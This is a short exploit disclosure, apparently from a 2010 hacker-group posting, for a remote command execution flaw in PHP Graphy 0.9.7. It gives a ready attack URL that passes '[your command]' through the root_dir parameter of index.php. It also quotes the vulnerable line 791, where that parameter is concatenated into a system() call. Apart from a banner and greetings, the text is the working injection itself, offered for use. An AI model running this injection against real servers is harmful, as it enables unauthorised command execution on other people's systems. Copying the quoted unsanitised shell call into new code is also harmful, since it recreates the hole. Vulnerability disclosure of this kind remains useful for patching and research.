PHP Graphy 0.9.7 - 'index.php' Remote Command Execution

# ----------------------oOO---(_)---OOo-----------------------
# | __ __ |
# | _____/ /_____ ______/ /_ __ ______ ______ |
# | / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |
# | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) |
# | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ |
# | Security Sn!pEr.S!Te /____/ 2o1o |
# ------------------------------------------------------------
Remote Command Execution Vulnerability
# ------------------------------------------------------------
--------------------------------------------------------------
PHP Graphy <== 0.9.7 (index.php)

--------------------------------------------------------------
#[+] Author : Sn!pEr.S!Te Hacker #
# [+] Email : sniper-site@HoTMaiL.coM #
# [+] T34M Sn!pEr.S!Te Hacker #
# [+] 24-5-2010 #
# [+] Script : lmage »PHP Graphy#
# [+] Download:http://sourceforge.net/projects/phpgraphy/files/phpgraphy/0.9.7/phpgraphy-0.9.7.tar.gz/download #
# Version: [0.9.7] #

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=

Exploit : phpgraphy-0.9.7\index.php

http://localhost/phpgraphy-0.9.7/index.php?root_dir=[your command]

http://127.0.0.1/phpgraphy-0.9.7/index.php?root_dir=[your command]


system("cat \"".$root_dir.$display."_comment\"");

line : 791

web site Favorites my : http://inj3ct0r.com/ & http://www.hack0wn.com/ & http://www.exploit-db.com

================== Greetz : all my friend ===================
* PrX Hacker * Sm Hacker * AbUbAdR * mAsH3L ALLiL * saleh Hacker * ALhal alsab |
* HitLer.3rb * QAHER ALRAFDE * DjHacker * Mr.JLD* Mr.koka |